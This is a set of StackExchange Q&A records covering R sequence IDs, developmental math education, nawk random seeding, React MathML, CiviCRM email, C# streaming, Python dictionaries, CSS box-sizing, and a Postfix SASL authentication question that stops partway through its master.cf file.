level, we would like to create a unique ID for a sequence of consecutive days in a specific country (if two or more days of events in a country are consecutive --> create unique ID), so that I can ultimately reduce the data frame to specific sequences of events rather than event days. \nI did not manage to aggregate the data based on the sequence of events. I believe this response is similar (Creating groups of consecutive days meeting a given criteria) however it is in SQL.\nThe data has the following format:\n<code>country <- c(\"Angola\",\"Angola\",\"Angola\",\"Angola\",\"Angola\", \"Benin\",\"Benin\",\"Benin\",\"Benin\",\"Benin\",\"Benin\")\nevent_date <- as.Date(c(\"2017-06-16\", \"2017-06-17\", \"2017-06-18\", \"2017-08-22\", \"2017-08-23\", \"2019-04-18\", \"2019-04-19\", \"2019-04-20\", \"2018-03-15\", \"2018-03-16\", \"2016-03-17\"))\n\nmydata <- data.frame(country, event_date)\n<\/code>\nIn the output, I expect to have a new column with the ID that is unique to each series of events in a country:\n<code>seq.ID <- c(1,1,1,2,2,3,3,3,4,4,4)<\/code>\n<code>mydata2 <- data.frame(country, event_date, seq.ID)<\/code>\nSo that ultimately, I can reduce the data to the level of country and sequence of events:\n<code>mydata3 <- mydata2[!duplicated(mydata2$seq.ID),]<\/code>\nAnswer: Try:\n<code>library(dplyr)\n\nmydata %>%\n group_by(country) %>%\n distinct(seq.ID = cumsum(event_date != lag(event_date, default = first(event_date)) + 1L)\n<\/code>\nOutput:\n<code># A tibble: 5 x 2\n# Groups: country [2]\n seq.ID country\n <int> <fct> \n1 1 Angola \n2 2 Angola \n3 1 Benin \n4 2 Benin \n5 3 Benin \n<\/code>\nYou can also use the <code>.keep_all<\/code> argument in <code>distinct<\/code> and preserve the first date of each sequence:\n<code>mydata %>%\n group_by(country) %>%\n distinct(seq.ID = cumsum(event_date != lag(event_date, default = first(event_date)) + 1L),\n .keep_all = TRUE)\n\n# A tibble: 5 x 3\n# Groups: country [2]\n country event_date seq.ID\n <fct> <date> <int>\n1 Angola 2017-06-16 1\n2 Angola 2017-08-22 2\n3 Benin 2019-04-18 1\n4 Benin 2018-03-15 2\n5 Benin 2016-03-17 3\n<\/code>\nIn case of desired non-aggregated output with different sequence IDs, you could do:\n<code>mydata %>%\n mutate(\n seq.ID = cumsum(\n (event_date != lag(event_date, default = first(event_date)) + 1L) |\n country != lag(country, default = first(country))\n )\n )\n\n country event_date seq.ID\n1 Angola 2017-06-16 1\n2 Angola 2017-06-17 1\n3 Angola 2017-06-18 1\n4 Angola 2017-08-22 2\n5 Angola 2017-08-23 2\n6 Benin 2019-04-18 3\n7 Benin 2019-04-19 3\n8 Benin 2019-04-20 3\n9 Benin 2018-03-15 4\n10 Benin 2018-03-16 4\n11 Benin 2016-03-17 5\n<\/code>\nNote that there is a typo in your last <code>event_date<\/code>, this is why the outputs don't correspond 100% to your desired output.\nComment: Thanks much for this solution. While it works well for the sample I provided, it doesn't work on the full dataset with the exact same data structure. I still try to figure out what the problem is and let you know once I find a solution.\nComment: Just figured out that I had to add arrange(country, event_date) to make it work properly with the full dataset.\nComment: Thank you very much....I just realized that I missed to provide a crucial line in the code (what the seq ID should look like) - and just edited it. The tricky bit is that I would like every unique country-sequence to have their own ID (i.e. they shouldn't be repetitive across countries). So that ultimately I can select all unique country-sequences easily by deleting duplicates.\nComment: See my edit - note that there is a typo in your last `event_date` so the last line doesn't correspond to your desired output.\n","meta":{"source":"stackoverflow","title":"Create ID for specific sequence of consecutive days based on grouping variable in R","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is accelerated developmental math education, and is it a good idea?\n\nQuestion: I teach physics and math at a community college in California. I got in a politically tinged discussion with a colleague today in which I claimed that one of socialism's weaknesses was its historical unwillingness to throw failed programs in the trash, and I challenged him to name a single positive educational reform that had occurred within our lifetimes in American community colleges and had spread and taken root. Annoyingly, he was able to come up with an example, which was accelerated developmental math education.\nI hadn't known until today that such a thing existed, and it doesn't yet exist at my school. I'm still hazy on what it is.\nWhat exactly is accelerated developmental math education? How does it work, and is it a good idea?\nComment: \"unwillingness to throw failed programs in the trash\" - reminds me of the sunk-cost fallacy: http:\/\/enciklopedia-vortaro-de-la-merk-angla.weebly.com\/temo-sunk-cost-fallacy.html\nAnswer: Accelerated developmental education includes a variety of mechanisms to shorten time students spend in remediation. It can include: Batching together multiple courses of remediation in one semester (say: 6 or 9 credits in one semester), likely with \"supports\" such as tutors and learning communities; batching together remediation in simultaneous credit-bearing courses (e.g., a 6 credit combined remedial algebra and statistics course); giving short workshops of a few days and then re-taking placement tests in basic skills; or possibly simply eliminating remedial courses altogether. \nThe motivation is based on the observation that students assigned to remediation are likely to fail and drop out of school -- and an interpretation that anything that minimizes or eliminates remediation is a good thing (i.e., keeps students in school, keeps them attending other courses, increases total credits and chance of graduation). One point that proponents of acceleration like to make is that some percentage of students who pass a remedial course still drop out before the next math course in the sequence (I've seen 20% thrown around as an estimate; \"life happens\" is a common attribution). \nThinkers at the Community College Research Center, Teachers College, Columbia University have been at the forefront of this movement. Consider Jaggers, et. al., \"Designing Meaningful Developmental Reform\" (CCRC, 2013). They identify three \"tensions\" in developmental education reform: (1) institutional autonomy vs. system-wide consistency, (2) efficient vs. effective assessment, and (3) supporting student progress vs. maintaining academic standards. On this latter point, they write: \n\nColleges often feel ambivalent about implementing changes that might\n improve student progression but could possibly undermine academic\n quality. Mounting evidence suggests, however, that accelerated\n developmental models\u2014such as shortening developmental sequences and\n mainstreaming upper level developmental students into college-level\n courses with mandatory supports\u2014lead to improved outcomes for these\n students.\n\nThey cite several findings that accelerated remediation leads to increased percentages of students who pass credit-bearing English and Math courses, for example:\n\nCritics would include Scherer and Anson in \"Community Colleges and the Access Effect\" (Palgrave Macmillan, 2014). In chapter 1 they make the point that thinking on remediation has made something of a full circle: in the 60's-70's larger number of students were entering unprepared and failing college-level math courses (under a \"'Right to fail' philosophy\"); the 80's-90's saw the blossoming of remedial education to address these student's needs; and the 00's-10's are seeing a backlash against remediation. In chapter 3 they write of developmental education:\n\nEnemy. Gated. Broken. Brick wall. Dysfunctional. Disaster. Bridge to\n nowhere. Burial ground. Senior research analyst for the U.S.\n Department of Education Clifford Adelman ultimately tied the divisive\n rhetoric to blind allegiance to the completion agenda and explained\n that, \"As a consequence, what often pours out are scare stories that\n make for good press and bad policy. The bad data-driven scare story,\n in fact, has become the preferred narrative.\" Developmental education\n has been especially painted with the broad brush of failure by\n completion guardians who believe that maintaining open admissions at\n our nation's community colleges and freeing low-skilled students from\n assignment to developmental education constitutes sensible completion\n strategy. Implicit in the arguments of developmental education critics\n are many false assumptions, chief among them that most students\n currently enrolled in developmental education would be much better\n served by enrolling in college-level coursework with embedded support.\nThat assumption, prompted by the realization that life events have a\n greater chance of derailing completion the longer a student remains in\n college, has led some completion advocates to herald the \"strategy\" of\n racing low-skilled students through higher education as an acceptable\n way to increase American postsecondary credential award...\nUsing the example of someone pursuing \"a two-year nursing\n certificate,\" Bill Gates declared, \"We owe it to every American to\n make it pretty darn easy for them to get through that system.\"\n\n(I will point out that the Gates Foundation is one of the primary sponsors of education reform today; note that they funded the CCRC report quoted above.) \nAs one example, the CCRC report provides a pretty good road map for changes to remediation that have occurred at CUNY in the past few years. Institutional autonomy on the issue has been largely sidestepped in favor of central system planning. Students universally taking placement tests for basic arithmetic skills was eliminated a few years back. Most recently, the requirement that all students pass basic writing and algebra tests before graduating has been removed. A new central requirement is that non-STEM majors be provided with a credit-bearing math course sans algebra prerequisite. The expectation is that graduation rates will rise as a result. \nAnswer: My sense is that it is a good idea. I will come back later to write a more complete answer, but much of what I will say can be found at the website of the California Acceleration Project.\n","meta":{"source":"matheducators.stackexchange","title":"What is accelerated developmental math education, and is it a good idea?","dup_signals":{}},"subset":"stackexchange"} +{"text":"rand() in for loop in nawk returns always same value -ksh\n\nQuestion: i am troubling myself too much time now with this rand().\nI want to add <code>1000<\/code> random numbers in an array, this is what i have so far, it works ith no error, but rand assigns all the time the same number in the arrays passing. the vary of the random numbers i want it to be from 1 to 999... any ideas whats going wrong? \nbtw i am running in ksh...\n<code>nawk ' BEGIN{ \n for (i=0; i<=999; i++) {\n srand()\n NUMBERS[i]= int(rand()*(999))\n print NUMBERS[i]\n }\n}'\n<\/code>\nP.S.\nNot a dublicate, no other same question for ksh.\nUPDATED\n<code>nawk ' BEGIN{ \n srand(1)\n for (i=0; i<=999; i++) {\n NUMBERS[i]= int(rand()*(999))\n XNUMBERS[i]= int(rand()*(999))\n print NUMBERS[i]\n print XNUMBERS[i]\n }\n}'\n<\/code>\nUPDATE_2\nSo the working code i have is this \n<code>NUMBERS=`nawk ' BEGIN{ \n srand()\n for (i=0; i<=999; i++) {\n printf(\"%s\\n\", 100 + int(rand() * (899)));\n } \n}'`\nNUMBERS\n#echo $NUMBERS\nXNUMBERS=`nawk ' BEGIN{ \n srand()\n for (i=0; i<=999; i++) {\n XNUMBERS[i]= 100 + int(rand() * (899));\n }\n for (i=0; i<=999; i++) {\n ver=XNUMBERS[i] \"\";\n rev = \"\";\n for (q=length(ver); q!=0; q--) {\n rev = rev substr(ver, q, 1);\n }\n printf(\"%s\\n\", XNUMBERS[i] \"|\" rev );\n }\n}'`\n<\/code>\ni am creating two different lists, but the rand() is giving in both the same exact numbers in the same position.... how can i make the second rand give different numbers?????\nFinal Update\nSooooo, to any people reading and have the same problem, the solution is to ue a sleep 1 between the two parts that you call the srand....\nAnswer: Put the <code>srand()<\/code> call outside the loop. For the same seed value <code>rand()<\/code> would produce the same sequence of numbers. <code>srand()<\/code> without any argument uses the current timestamp as seed and the loop probably happens to use the same seed value. Hence, you see the same number.\nComment: Right, the timestamp resolution is in seconds so your loop will produce the same value on each iteration as long as all the iterations happen within the same 1-second window. If the current time happened to cross from 12:00:01 to 12:00:02 or similar while your loop was running then you'd get 2 values. @hedgehog - Moving srand() outside of the loop is the right thing to do but by using a hard-coded seed value of 1 you're negating the whole point of using srand() which is to get a new seed value for rand() on every call to the script (as long as the calls are 1 second or more apart).\nComment: It's not \"wrong\" per se (to use the same fixed seed). But for *same* seed value, rand() will produce exactly the same sequence of numbers. i.e. with `srand(1)`, you'll *always* get the *same* set of numbers all the time (now, tomorrow, next year etc). Typically, that's why *time* is used as seed which is reasonably good seed for most applications.\nComment: Yes, you are wrong. It's a **seed** value for rand() so it's somethign rand() uses as a \"previous value\" when generating it's next random number. It's functionally no different than if you didn't call srand() at all in as much as rand() will produce the same \"random\" number the first time it's called on each invocation of your awk script. rand() always outputs a value that's `>= 0` and `< 1` so to produce random integers between 1 and 999 is `srand(); print int(1 + rand()*999)`.\nComment: There's no need to introduce a delay, just seed them with $RANDOM or similar instead of the current epoch time, e.g. `awk -v seed=\"$RANDOM\" 'BEGIN{srand(seed) ...`. This: `int(rand()*(999))` will give you numbers from 0 to 998, btw, not from 1 to 999 as you say you want. Please re-read my comments above for how to do what you say you want.\nComment: screw me.. that was the fault? cant believe it... check please the updated post with the code, i put the srand out of the loop, is it wrong if i add the value 1? i use it for saying, that 1 is the starting value.\nComment: i see, but i thought i read that the value that you add to srand, so in this case i tried 1, is the starting value of the random numbers, so as i see it its like i am saying pick a random number from 1 to 999... am i wrong?\nComment: i see your points guys, i sorted it out now, thank you a lot... plus @EdMorton you must really like my posts, i have an answer of yours on every single one :p\nComment: You don't have an answer of mine on this one or your [last one](http:\/\/stackoverflow.com\/q\/36745088\/1745001) so I think that might be a slight exaggeration. Not that I don't like your posts, of course :-).\nComment: @EdMorton well, you did comment though :p so that counts hihihihi\nComment: @EdMorton anyways, i got a problem with using this the rand( because i am using it in the same script to make two random lists, and it is giving the same exact numbers in both lists, i need it to give different numbers, SEE UPDATE^^)\nComment: @hedgehog The issue is same as before: srand() most likely gets run with the *same seed* value twice. Just remove the second srand() call from the script.\nComment: i found the sollution..... its because both srand were being run in the same second, so they had same value from time of the pc, i just added a sleep 1 between the two nawk and its working fine :)\n","meta":{"source":"stackoverflow","title":"rand() in for loop in nawk returns always same value -ksh","dup_signals":{}},"subset":"stackexchange"} +{"text":"React 16 HTML attributes with MathML tags\n\nQuestion: I'm using MathML markup language to render math equations on my web app. Here's an example of an simple equation which is problematic:\n<code><math xmlns=\"http:\/\/www.w3.org\/1998\/Math\/MathML\"><mfenced open=\"[\" close=\"]\"><mn>8<\/mn><\/mfenced><\/math>\n<\/code>\nThe problem is that React will not treat the attributes of the mfenced tag like we would want to. It treats the \"open\" attribute as if it was used in a HTML context, so it will not accept its \"[\" value. React will output the mfenced tag like this:\n<code><mfenced open close=\"]\"><mn>8<\/mn><\/mfenced>\n<\/code>\nOf course, this breaks the equation in the browser. Is there a way to tell React not to change this attribute?\nComment: what you need is something like an `xml-loader` or xml parser at the babel level so that while compiling it can parse those syntaxes (just a thought)\nAnswer: The MathJax React component is what you were looking for.\nImport the package and fill the math property with some text containing your formals. Wrap TeX in $ or $$ and ASCIImath in `. Paste MathML as is.\nHere's an example:\n<code>import React, {Component} from 'react'\nimport {render} from 'react-dom'\nimport MathJax from 'react-mathjax-preview'\n\nconst asciimath = '`sum_(i=1)^n i^3=((n(n+1))\/2)^2`' # Because of the backtick\nconst math = String.raw`\n <math xmlns=\"http:\/\/www.w3.org\/1998\/Math\/MathML\" display=\"block\">\n <menclose notation=\"circle box\">\n <mi> x <\/mi><mo> + <\/mo><mi> y <\/mi>\n <\/menclose>\n <\/math>\n\n $$\\lim_{x \\to \\infty} \\exp(-x) = 0$$\n\n ${asciimath}`\n\nclass Demo extends Component {\n constructor(props) {\n super(props);\n this.state = {\n math: tex\n }\n render() {\n return <MathJax math={this.state.math} \/>\n }\n}\n<\/code>\nThey also have a more advanced demo inside the repository.\nPS: I saw one issue related to MathML in their repo. A workaround is described there.\nComment: Equations in my app are integrated into paragraphs (html p tags), and this package renders the equations into div tags. Div tags are not allowed as children of p tags though... So I finally used a parser ([html-react-parser](https:\/\/github.com\/remarkablemark\/html-react-parser)) that detects and replace my math tags with span tags which use the react property \"dangerouslySetInnerHTML\" with the MathML equation as the property value. To convert my MathML equations to string, I used [react-element-to-string](https:\/\/github.com\/glenjamin\/react-element-to-string)\nComment: As I tried to explain, unfortunately, the MathJax React package you suggested to use did not solve my problem. I will post a more detailed answer with my solution soon.\n","meta":{"source":"stackoverflow","title":"React 16 HTML attributes with MathML tags","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I replace the \"From\" address from my mailings?\n\nQuestion: I setup a default adress in CiviMail -> From Email Adresses , like this : \n<code>\"Example\" <email@example.com><\/code>\nbut the problem is that when I send mails, the \"From adress\" change and become :\n<code>\"Example\" <firstname.lastname@example.com><\/code>\n(I specify that I use a gmail account in the SMTP sending settings)\nIs it possible to force that mailing adress so it become \"email@example.com\" ?\nAt the begining, I was using a private adress (in my own domain) for civiCRM SMTP's settings (and it worked fine), but lately we need to migrate these mails to Office365 \/ Exchange mails and I have never been able to get CiviCRM mailings to work with the new Office365\/Outlook\/Exchange settings, that's why I opted for an SMTP account that uses gmail.\nComment: have you checked both \/civicrm\/admin\/domain?action=update&reset=1 and \/civicrm\/admin\/options\/from_email_address?reset=1\nComment: I try the first link ( `\/wp-admin\/admin.php?page=CiviCRM&q=civicrm%2Fadmin%2Fdomain%3Faction%3Dupdate&reset=1` in my wordpress ) and I land on the admin page with no particular message.\nI try the second with `\/wp-admin\/admin.php?page=CiviCRM&q=civicrm\/admin\/options\/from_email_address?reset=1` but I got an error\n\nand it seems like I got the same problem with the \"from\" email changing.\nComment: @petednz-fuzion The error in log file : https:\/\/pastebin.com\/raw\/b4SyVE1u\nComment: also, I replaced the \"?\" with a \"&\" in the second link and it seems to works, I land on the \"From Email Adresses\" page , but the email@example.com email continues to appear in the From field of my mailings.\nComment: What version of Civi are you running? Just a note that in 4.7.30 they removed the duplicate 'From email address' setting in the organizational contact that petednz is referring to in the first link.\nComment: @RayWright I use version 5.5.1\nComment: Pretty sure that's an effect of sending via Gmail - it's an anti-spoofing thing if you try to send with a non-gmail account.\nAnswer: So I am assuming that the only thing that changed between \"it worked\" and \"it doesn't\" is to switch from your own smtp to your gmail one.\nBeside the problem you mention, using smtp from gmail will not work to send mass emails, they have a lot of limits and as soon as your list has more than a handful of emails, you will have problems.\nThere as several providers (sendgrid, mailjet...) that are integrated with civi, and I'd recommend you switching to one of them\nAnd it should solve out your gmail.com problem too\n","meta":{"source":"civicrm.stackexchange","title":"How do I replace the \"From\" address from my mailings?","dup_signals":{}},"subset":"stackexchange"} +{"text":"C# Client-Server Video streaming\n\nQuestion: Are there any c# libraries to facilitate the streaming of video in a client-server architecture? I would also be interested in finding some resources to learn more on the subject of video streaming on the .NET platform, and streaming in general.\nThanks!\nComment: I suppose you could use WCF. Streaming from IIS, it looks like you just install [this](http:\/\/learn.iis.net\/page.aspx\/620\/getting-started-with-iis-live-smooth-streaming\/). Streaming video with WCF would look something like [this](http:\/\/blogs.msdn.com\/b\/gblock\/archive\/2010\/11\/24\/streaming-over-http-with-wcf.aspx). What do you hope to gain from using WCF?\nComment: Do you want to consume or produce the stream?\nComment: ultimately I would be writing both the client and server side of the system\nComment: Do you need to do it yourself, or can you rely on IIS to stream it for you?\nComment: I suppose iis would be an option. Would wcf services be useful at all in a situation like this? I have very minimal video experience\nComment: Wcf was just the first thing tthat came to mind really . Thank you, I will check out the links\nAnswer: In my previous attempts at this very problem I have always come to the conclusion (from other people's recommendations) that this book is the keystone piece to that problem - http:\/\/www.amazon.com\/Programming-Microsoft-DirectShow-Television-Pro-Developer\/dp\/0735618216\nI had read before that it was out of print and only used copies were available at around $150 - but it looks like there are now new prints available which has dropped the price down to around $90 - but you still have to contend with it being a technology that Microsoft has deemed depracated (but they haven't replaced it with anything new yet) and of course if you look at the reviews on the book it certainly doesn't seem worth even $40 which would be my cap on something written almost a decade ago. \nThat being said - it has been about two years since I was attempting such a project so this information may be as deprecated as directx itself! ;)\n","meta":{"source":"stackoverflow","title":"C# Client-Server Video streaming","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python Dictionary of dictionaries\n\nQuestion: I'm using python3.\nI have a dictionary\n<code>simulations = {\n 'wk01' : '183',\n 'wk02' : '170',\n 'wk03' : '184',\n}\n<\/code>\nand a separate dictionary containing a descriptive string\n<code>condition_old = {'slow'}\n<\/code>\nI am later joining simulations and condition_old to get a complete string.\n<code>simulations = {simulation : '-'.join([simulations[simulation],condition_old]) for simulation in simulations}\n\n<\/code>\nThis results in output =\n<code>{'wk01': '183-slow', 'wk02': '170-slow', 'wk03': '180-slow'}<\/code>\nI am then plotting data for each condition (e.g. slow).\nWhat I want to be able to do is to increase the number of values in the conditions e.g.:\n<code>condition_new = {'slow','med','fast}\n<\/code>\nand return a dictionary for each:\ncondition01 = <code>{'wk01': '183-slow', 'wk02': '170-slow', 'wk03': '180-slow'}<\/code>\ncondition02 = <code>{'wk01': '183-med', 'wk02': '170-med', 'wk03': '180-med'}<\/code>\ncondition03 = <code>{'wk01': '183-fast', 'wk02': '170-fast', 'wk03': '180-fast'}<\/code>\nWhat also needs to be considered is that the number of values in condition_new can vary, so I can't explicitly state 3 dictionary names to populate.\nMaybe a dictionary within a dictionary would be sufficient.\nIn the end I want to create 3 separate plots based on condition01 condition02 condition03.\nThanks\nComment: Have you tried creating a dictionary of dictionaries yet? Also, why not a list of dictionaries? By the way, `condition_old` is a set, not a dict.\nComment: I am unsure how, i tried to do a few things but because they don't have the same keys it wasn't working.is it better i change condition_old and condition_new to lists?\nComment: cases is undefined in your expression for simulations.\nComment: @DarrylG thanks - i copied from another test. updated now.\nAnswer: You could use a loop and a dictionary comprehension. Something like:\n<code>simulations = {\n 'wk01' : '183',\n 'wk02' : '170',\n 'wk03' : '184',\n}\n\nconditions = {'slow', 'med', 'fast'}\n\nthedicts = dict()\nfor cond in conditions:\n thedicts[cond] = {k: f'{d}-{cond}' for k, d in simulations.items()}\n<\/code>\nComment: this looks good - how can i store all three as opposed to printing them though?\nComment: @okpython I edited the answer to put the three resulting dicts into another dict.\nComment: what if i wanted to get 3 separate dictionaries, as opposed to nesting them?\nComment: Not necessarily \na good idea. See e.g. http:\/\/stupidpythonideas.blogspot.com\/2013\/05\/why-you-dont-want-to-dynamically-create.html?m=1\n","meta":{"source":"stackoverflow","title":"Python Dictionary of dictionaries","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't connect 2nd swipe gesture in interface builder\n\nQuestion: I'm trying to add two gestures to a UIView in interface builder (swipe left and swipe right).\nThe first one (swipe left) works ... but the 2nd swipe gesture (swipe right) doesn't work, and I think it's because I can't connect the \"New Referencing Outlet Connection\" to the view (like my 1st gesture has) [see attached image].\n\nIs this the reason?\nI achieve this programatically, but would really like to understand how to add multiple gestures in interface builder.\nComment: Wait, that's what the Referencing Outlet Collection Connection does??? +1\nAnswer: Look at the connections menu. They both automatically get added to the gestureRecognizers collection.\nAnswer: I made a short tutorial video on how to use multiple gestures (right and left) in the interface builder. No coding is needed. I think a video is a better explanation for you :)\nMy english is not the best, but I hope it helps you! :)\nXcode connect multiple gestures\n","meta":{"source":"stackoverflow","title":"Can't connect 2nd swipe gesture in interface builder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Do not fill the space more div\n\nQuestion: i have this code\n<code><div id=\"menu_right_levels\">\n <div class=\"level\"> Livello 1 <\/div>\n <div class=\"level\"> Livello 2 <\/div>\n <div class=\"level\"> Livello 3 <\/div>\n <div class=\"level\"> Livello 4 <\/div>\n <div class=\"level\"> Livello 5 <\/div>\n <div class=\"level\"> Livello 6 <\/div>\n <div class=\"level\"> Livello 7 <\/div>\n <div class=\"level\"> Livello 8 <\/div>\n <div class=\"level\"> Livello 9 <\/div>\n <div class=\"level\"> Livello 10 <\/div>\n<\/div>\n<\/code>\nAnd this Style\n<code> .level {\n width: 100%;\n height: 10%;\n border: 1px solid black;\n }\n<\/code>\nI need a responsive div who auto fill him and have the same height, i don't know what, but my 10 divs, with height:10% appear so:\nAnswer: It's because of the border: Every div is in fact 10% + 2px tall. What you need is the CSS <code>box-sizing<\/code> property. With <code>box-sizing: border-box;<\/code> the CSS <code>height<\/code> property is also applied to the padding and border.\nJSFiddle: https:\/\/jsfiddle.net\/q39vvzfv\/\n\n<code>var boxSizing = \"border-box\";\nvar els = document.getElementsByClassName(\"level\");\nfunction toggleBoxSizing(e) {\n if (boxSizing == \"border-box\") {\n boxSizing = \"content-box\";\n e.target.innerHTML = \"Enable box-sizing\";\n } else {\n boxSizing = \"border-box\";\n e.target.innerHTML = \"Disable box-sizing\";\n }\n for (var i = 0; i < els.length; i++) {\n els[i].style.boxSizing = boxSizing;\n }\n}<\/code>\n<code>body {\n margin: 0;\n padding: 0;\n}\n#orange {\n background-color: #FF4500;\n height: 940px;\n}\n#menu_right_levels {\n float: right;\n height: 940px;\n width: 380px;\n background-color: #1E90FF;\n}\n.level {\n width: 100%;\n height: 10%;\n border: 1px solid black;\n text-align: center;\n box-sizing: border-box;\n }<\/code>\n<code><div id=\"menu_right_levels\">\n <div class=\"level\"> Livello 1 <\/div>\n <div class=\"level\"> Livello 2 <\/div>\n <div class=\"level\"> Livello 3 <\/div>\n <div class=\"level\"> Livello 4 <\/div>\n <div class=\"level\"> Livello 5 <\/div>\n <div class=\"level\"> Livello 6 <\/div>\n <div class=\"level\"> Livello 7 <\/div>\n <div class=\"level\"> Livello 8 <\/div>\n <div class=\"level\"> Livello 9 <\/div>\n <div class=\"level\"> Livello 10 <\/div>\n<\/div>\n<div id=\"orange\">\n <button onclick=\"toggleBoxSizing(event)\">Disable box-sizing<\/button>\n<\/div><\/code>\nAnswer: It's because of your borders. Every div is essentially 10% + 2px tall. The 2px adds up (adds up to 20px to be exact).\nA simple solution would be to add padding to the red div to make up for the extra 20 pixels:\n\n<code>#container {\n height: 600px\n}\n#left {\n background: red;\n float: left;\n height: 100%;\n width: 100px;\n padding-bottom: 20px; \/* BOTTOM PADDING ADDED *\/\n}\n#menu_right_levels {\n float: left;\n width: 300px;\n height: 100%\n}\n.level {\n width: 100%;\n height: 10%;\n border: 1px solid black;\n}<\/code>\n<code><div id=\"container\">\n <div id=\"left\"><\/div>\n\n <div id=\"menu_right_levels\">\n <div class=\"level\">Livello 1<\/div>\n <div class=\"level\">Livello 2<\/div>\n <div class=\"level\">Livello 3<\/div>\n <div class=\"level\">Livello 4<\/div>\n <div class=\"level\">Livello 5<\/div>\n <div class=\"level\">Livello 6<\/div>\n <div class=\"level\">Livello 7<\/div>\n <div class=\"level\">Livello 8<\/div>\n <div class=\"level\">Livello 9<\/div>\n <div class=\"level\">Livello 10<\/div>\n <\/div>\n<\/div><\/code>\nComment: box-sizing should be used here, so no need to mind about border-size, or eventual padding ...\n","meta":{"source":"stackoverflow","title":"Do not fill the space more div","dup_signals":{}},"subset":"stackexchange"} +{"text":"Postfix authentication failure, can't send email out\n\nQuestion: I was trying to set up my postfix email server and got the following errors when using the command \"auth login\" in the telnet session with my postfix service:\n<code>535 5.7.8 Error: authentication failed: generic failure<\/code>\n<code>warning: SASL authentication failure: cannot connect to saslauthd server: No such file or directory<\/code>\nI've followed the link below to set up the service.\nHow To Install and Configure Postfix on Ubuntu 16.04\nI've created 2 users, \"postmaster\" and \"yida\" in my computer. \"postmaster\" could not receive any email using the s-nail mail but could send to \"yida\", while \"yida\" could send and receive email but only to and from local user, like \"postmaster\".\nThe mail log has the following problem:\n<code>postfix\/smtp[3386]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4001:c11::1a]:25: Network is unreachable\n<\/code>\nThis happens when I tried to send email to my own gmail account.\nThe interesting thing was that I gave up in the authentication and continued to type \"mail from\" command in my testing telnet session and the server gave me an \"OK\" response. Looks like Postfix was not requiring authentication.\nPlease see below the related files:\n\/etc\/postfix\/master.cf\n<code># Postfix master process configuration file. For details on the format\n# of the file, see the master(5) manual page (command: \"man 5 master\" or\n# on-line: http:\/\/www.postfix.org\/master.5.html).\n#\n# Do not forget to execute \"postfix reload\" after editing this file.\n#\n# ==========================================================================\n# service type private unpriv chroot wakeup maxproc command + args\n# (yes) (yes) (no) (never) (100)\n# ==========================================================================\nsmtp inet n - y - - smtpd\n#smtp inet n - y - 1 postscreen\n#smtpd pass - - y - - smtpd\n#dnsblog unix - - y - 0 dnsblog\n#tlsproxy unix - - y - 0 tlsproxy\n#submission inet n - y - - smtpd\n -o syslog_name=postfix\/submission\n# -o smtpd_tls_security_level=encrypt\n -o smtpd_sasl_auth_enable=yes\n# -o smtpd_reject_unlisted_recipient=no\n# -o smtpd_client_restrictions=permit_sasl_authenticated,reject\n# -o smtpd_helo_restrictions=$mua_helo_restrictions\n# -o smtpd_sender_restrictions=$mua_sender_restrictions\n# -o smtpd_recipient_restrictions=\n# -o smtpd_relay_restrictions=permit_sasl_authenticated,reject\n# -o milter_macro_daemon_name=ORIGINATING\n#smtps inet n - y - - smtpd\n -o syslog_name=postfix\/smtps\n# -o smtpd_tls_wrappermode=yes\n -o smtpd_sasl_auth_enable=yes\n# -o smtpd_reject_unlisted_recipient=no\n# -o smtpd_client_restrictions=permit_sasl_authenticated,reject\n# -o smtpd_helo_restrictions=$mua_helo_restrictions\n# -o smtpd_sender_restrictions=$mua_sender_restrictions\n# -o smtpd_recipient_restrictions=\n# -o smtpd_relay_restrictions=permit_sasl_authenticated,reject\n# -o milter_macro_daemon_name=ORIGINATING\n#628 inet n - y - - qmqpd\npickup unix n - y 60 1 pickup\ncleanup unix n - y - 0 cleanup\nqmgr unix n - n 300 1 qmgr\n#qmgr unix n - n 300 1 oqmgr\ntlsmgr unix - - y 1000? 1 tlsmgr\nrewrite unix - - y - - trivial-rewrite\nbounce unix - - y - 0 bounce\ndefer unix - - y - 0 bounce\ntrace unix - - y - 0 bounce\nverify unix - - y - 1 verify\nflush unix n - y 1000? 0 flush\nproxymap unix - - n - - proxymap\nproxywrite unix - - n - 1 proxymap\nsmtp unix - - y - - smtp\nrelay unix - - y - - smtp\n# -o smtp_helo_timeout=5 -o smtp_connect_timeout=5\nshowq unix n - y - - showq\nerror unix - - y - - error\nretry unix - - y - - error\ndiscard unix - - y - - discard\nlocal unix - n n - - local\nvirtual unix - n n - - virtual\nlmtp unix - - y - - lmtp\nanvil unix - - y - 1 anvil\nscache unix - - y - 1 scache\n#\n# ====================================================================\n# Interfaces to non-Postfix software. Be sure to examine the manual\n# pages of the non-Postfix software to find out what options it wants.\n#\n# Many of the following services use the Postfix pipe(8) delivery\n# agent. See the pipe(8) man page for information about ${recipient}\n# and other message envelope options.\n# ====================================================================\n#\n# maildrop. See the Postfix MAILDROP_README file for details.\n# Also specify in main.cf: maildrop_destination_recipient_limit=1\n#\nmaildrop unix - n n - - pipe\n flags=DRhu user=vmail argv=\/usr\/bin\/maildrop -d ${recipient}\n#\n# ====================================================================\n#\n# Recent Cyrus versions can use the existing \"lmtp\" master.cf entry.\n#\n# Specify in cyrus.conf:\n# lmtp cmd=\"lmtpd -a\" listen=\"localhost:lmtp\" proto=tcp4\n#\n# Specify in main.cf one or more of the following:\n# mailbox_transport = lmtp:inet:localhost\n# virtual_transport = lmtp:inet:localhost\n#\n# ====================================================================\n#\n# Cyrus 2.1.5 (Amos Gouaux)\n# Also specify in main.cf: cyrus_destination_recipient_limit=1\n#\n#cyrus unix - n n - - pipe\n# user=cyrus argv=\/cyrus\/bin\/deliver -e -r ${sender} -m ${extension} ${user}\n#\n# ====================================================================\n# Old example of delivery via Cyrus.\n#\n#old-cyrus unix - n n - - pipe\n# flags=R user=cyrus argv=\/cyrus\/bin\/deliver -e -m ${extension} ${user}\n#\n# ====================================================================\n#\n# See the Postfix UUCP_README file for configuration details.\n#\nuucp unix - n n - - pipe\n flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)\n#\n# Other external delivery methods.\n#\nifmail unix - n n - - pipe\n flags=F user=ftn argv=\/usr\/lib\/ifmail\/ifmail -r $nexthop ($recipient)\nbsmtp unix - n n - - 